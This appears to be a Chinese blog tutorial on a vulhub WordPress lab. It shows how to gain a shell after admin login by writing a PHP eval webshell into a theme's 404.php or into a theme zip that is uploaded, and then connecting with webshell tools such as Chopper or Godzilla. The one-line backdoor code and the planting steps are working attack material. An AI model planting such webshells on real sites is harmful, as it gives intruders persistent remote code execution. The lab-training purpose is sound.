vulhub靶场之WordPress

第一步搭建环境

靶场地址,自行去gethub找

安装靶场,使用vm虚拟机或云服务器 需安装docker和docker-compose

执行命令

cd /vulhub/wordpress/pwnscriptum

docker-compose up -d

开启docker

docker ps -a查看运行端口

访问进行wordpress设置

第二步 给404.php中写入一句话木马

搭建靶场后台

进行简单的网站后台设置后即可进入如下页面

思路是修改其WP的模板写入一句话木马后门并访问其文件即可GetShel;登陆WP后点击【外观】--》【编辑】--》404.php

在404.php中写入一句话木马,删除其原本文件(可选),并更新文件

复制代码
<?php phpinfo();eval($_POST['cmd']);?>

访问以下路径可以访问到404.php文件

复制代码
/wp-content/themes/twentyfifteen/404.php
此为wordpress默认路径,若不知道也可百度搜索其所在位置

对木马使用你的武器库吧,这里小编选择了菜刀

是兄弟就来wordpress砍我!

第三步 这次我们换一个姿势,上传文件来上传木马

接着上一个环境使用...首先网上找一份免费的wordpress的zip主题文件

下载之后把一个木马文件添加到这个zip压缩包中

这里小编上传了一个666.php,内容如下

复制代码
<?php phpinfo();eval($_POST['cmd']);?>

将带有后门的文件加入到主题中并将主题压缩为ZIP文件...点击【外观】--》 【主题】--》「【添加】--》「【上传主題】--》「【浏览】--》【现在安装】

压缩文件中的文件名即为主题名

复制代码
访问
/wp-content/themes/【主题名】/【文件名】
/wp-content/themes/storeflex/666.php

对他使用你的哥斯拉吧

然而小编还是选择了菜刀,完

相关推荐
txg6663 小时前
网络安全领域简报(2026年7月3日—10日)
安全·web安全·网络安全
Chengbei115 小时前
SoloXSS:一款现代化的自托管 XSS平台
人工智能·安全·web安全·网络安全·自动化·xss·安全架构
2301_7803039019 小时前
网络安全、自动化运维、ERP、CRM、MES
运维·web安全·网络安全·自动化·安全威胁分析
技术不好的崎鸣同学1 天前
[GXYCTF2019]Ping Ping Ping 思路及解法
网络·安全·web安全
dehuisun1 天前
等保2.0实施方案
web安全
treesforest1 天前
高精度IP定位怎么选?从企业需求出发的选型指南
网络·数据库·tcp/ip·web安全·ip·高精度ip查询
doiito(Do It Together)1 天前
【Web安全,微服务安全】HashiCorp Vault 项目深度分析报告
web安全·微服务·安全架构
2601_962851741 天前
计算机毕业设计之基于SSM的网络安全课程资源分享平台
vue.js·算法·安全·web安全·yolo·目标检测·课程设计
HackTwoHub2 天前
ARL灯塔重构版:支持APP/小程序/WEB资产同步扫描
人工智能·安全·web安全·网络安全·小程序·重构·自动化
Chengbei112 天前
全新ARL资产灯塔系统(重构版),多维闭环侦察体系,覆盖边界探测、指纹识别、信息收集检测全链路场景
人工智能·安全·web安全·网络安全·重构·系统安全·xss